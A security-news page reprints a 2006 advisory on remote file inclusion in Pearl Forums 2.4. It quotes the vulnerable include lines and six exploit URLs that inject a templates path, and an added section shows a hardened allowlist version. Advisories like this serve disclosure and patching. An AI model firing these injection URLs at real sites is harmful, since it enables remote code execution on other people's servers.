Information Security



Additional information

  Daily summary of bugs in Web applications (PHP, ASP, JSP, CGI, Perl)

  phpPC 1.04 Multiples Remote File Inclusion

  PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability

  Vulnerability in PostNuke

  Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.

From:Dr Max Virus <drmaxvirus_(at)_w.cn>
Date:November 22, 2006
Subject:Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities

_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


/////////////////////////////////////////////////////////////////////////////////
////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main  Script Of Pearl Products
//Affected Version:2.4
//D
script:
http://sourceforge.net/project/downloading.php?group_id=102974&use_mirror=switch&filename=pearlforums2.4.zip&351611

/////////////////////////////////////////////////////////////////////////////////
////////////////////////////
//-------------------------------------------------------------------------------
---

Bug in addressbook.php & admin.php & merge.php & more than u expected.
Files r vulnerable, just try to check all files,
Like the Vulnerable Scripts Of Pearl

--------------------------------------------------------------------------------
\\

-------------------------------------------------------------------------------
Vul Codes:
include_once("$GlobalSettings[templatesDirectory]/addressbook.php");
include_once("$templatesDirectory/admin.php");

---------------------------------------------------------------------------------
--
Exploits:
~~~~~~~~~
Note that more variables are not sanitized so Exploits can work
Successfully when register_globals=on



code
http://[target]/[path]/includes/admin.php?templatesDirectory-evill code
http://[target]/[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill code
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill code
http://[target]/[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill code
http://[target]/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill code
http://[target]/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill code

   And Many Bugs u can discover, just download the script

---------------------------------------------------------------------------------
--
   Thx To:str0ke & www.milw0rm.com & www.zone-h.com & All My Friends
   Special Gr33Ts:ASIANEAGLE & Kacper & The Master

/////////////////////////////////////////////////////////////////////////////////
///
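
Added example (not part of the original advisory and not Pearl Forums code): a hardened replacement for the include pattern quoted under "Vul Codes", resolving templates from an application-defined root and a fixed allowlist instead of a variable the request can set. The names pf_template_path and PF_TEMPLATES, the allowlist contents and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example, not Pearl Forums code. pf_template_path(), PF_TEMPLATES and
// the temporary directory below are hypothetical names for illustration.
//
// Pattern from the advisory (path built from a request-settable variable):
//   include_once("$templatesDirectory/admin.php");

// Fixed allowlist: the only template names the application will ever include.
const PF_TEMPLATES = ['addressbook', 'admin', 'merge', 'password', 'profile', 'poll'];

// Returns the real path of an allowlisted template under $root, or throws.
// $root must come from application code (for example __DIR__ . '/templates'),
// never from $_GET, $_POST, $_COOKIE or a global that register_globals can set.
function pf_template_path(string $root, string $name): string
{
    if (!in_array($name, PF_TEMPLATES, true)) {
        throw new InvalidArgumentException("template not allowlisted: $name");
    }
    $realRoot = realpath($root);
    $path = realpath("$root/$name.php");
    // realpath() resolves symlinks and ".." and returns false for a missing
    // file, so the prefix comparison is made on the file's actual location.
    $prefix = $realRoot . DIRECTORY_SEPARATOR;
    if ($realRoot === false || $path === false
        || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("template missing or outside root: $name");
    }
    return $path;
}

// Constructed demo: a throwaway template root holding a single template.
$root = sys_get_temp_dir() . '/pf_demo_' . getmypid();
mkdir($root);
file_put_contents("$root/admin.php", "<?php echo \"admin template loaded\\n\";");

include_once pf_template_path($root, 'admin');
foreach (['http://example.invalid/x', '../admin', 'merge'] as $candidate) {
    try {
        include_once pf_template_path($root, $candidate);
    } catch (Exception $e) {
        echo get_class($e), ': ', $e->getMessage(), "\n";
    }
}
unlink("$root/admin.php");
rmdir($root);
```

On the server side, register_globals=Off (the setting was removed in PHP 5.4.0) and allow_url_include=Off remove the two conditions this class of bug depends on.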

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


